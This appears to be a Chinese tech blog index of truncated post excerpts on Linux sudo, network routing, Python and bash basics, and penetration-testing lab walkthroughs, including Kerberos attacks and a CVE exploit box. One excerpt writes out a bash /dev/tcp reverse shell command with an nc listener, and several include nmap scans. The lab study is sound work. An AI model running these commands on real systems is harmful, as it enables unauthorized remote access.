1. sudo授权的方法（1）把用户加入到sudo组或Wheel组，加入之后，用户默认可以以root用户身份做任何事情usermod -aG sudo 用户（2）使用sudo授权配置文件/etc/sudoers授权语句：被授权用户或组...

简介point 20SlortDifficulty INTERMEDIATErated by community INTERMEDIATE 实验环境攻击者 Kali 192.168.45.247受害者 IP 192.168.219.27 Linux 1. 信息收集收集受害者服务详情nmap -sV -A...

回想一下 Kerberos 协议是如何工作的。我们知道，当用户想要访问由服务主体名称 (SPN)托管的资源时，客户端会请求由域控制器生成的服务票证。然后，服务票证由应用程序服务器解密和验证，因为它...

实验环境Kali 192.168.45.247靶机 192.168.219.35 漏洞发掘nmap -p 1-20000 -T5 192.168.219.35发现端口是1881的可疑端口搜索发现可能有CVE-2023-33831漏洞  漏洞利用https://github.com/rod...

1. 前言静态路由是指由管理员手动配置和维护的路由。静态路由配置简单，被广泛应用于网络中。另外，静态路由还可以实现负载均衡和路由备份。因此，学习并掌握好静态路由的应用与配置是非常必要...

我们检查一下网络root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# netstat -anltp Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address ...

如图所示配置需求：1.如图所示，配置设备名称和IP地址每台设备都有环回口Loopbacko，设备Ra的地址为a.a.a.a/32如R1就有Lo0：1.1.1.1/32互联地址规则：设备Ra与设备Rb：192.168.ab.a/24和192.168...

1. python方式建立交互式shell攻击者先监听nc -lvnp 监听端口 受害者bash -c 'bash -i >& /dev/tcp/攻击者ip/攻击者端口 0>&1'再攻击者端就能得到shell 如果有python 可以使用...

1.input语句input语句（函数）我们前面学习过pint语句（函数)，可以完成将内容（字面量、变量等)输出到屏幕上。在Python中，与之对应的还有一个input语句，用来获取键盘输入。·数据输出：print...

1. for循环格式1：for NAME [ in WORDS ...]; do COMMANDS;done for变量名 [ in 列表 ];do 循环体 done for 变量名 [ in 列表 ] do 循环体 done执行机制：依次将列表中的元素赋值给变量名；每次...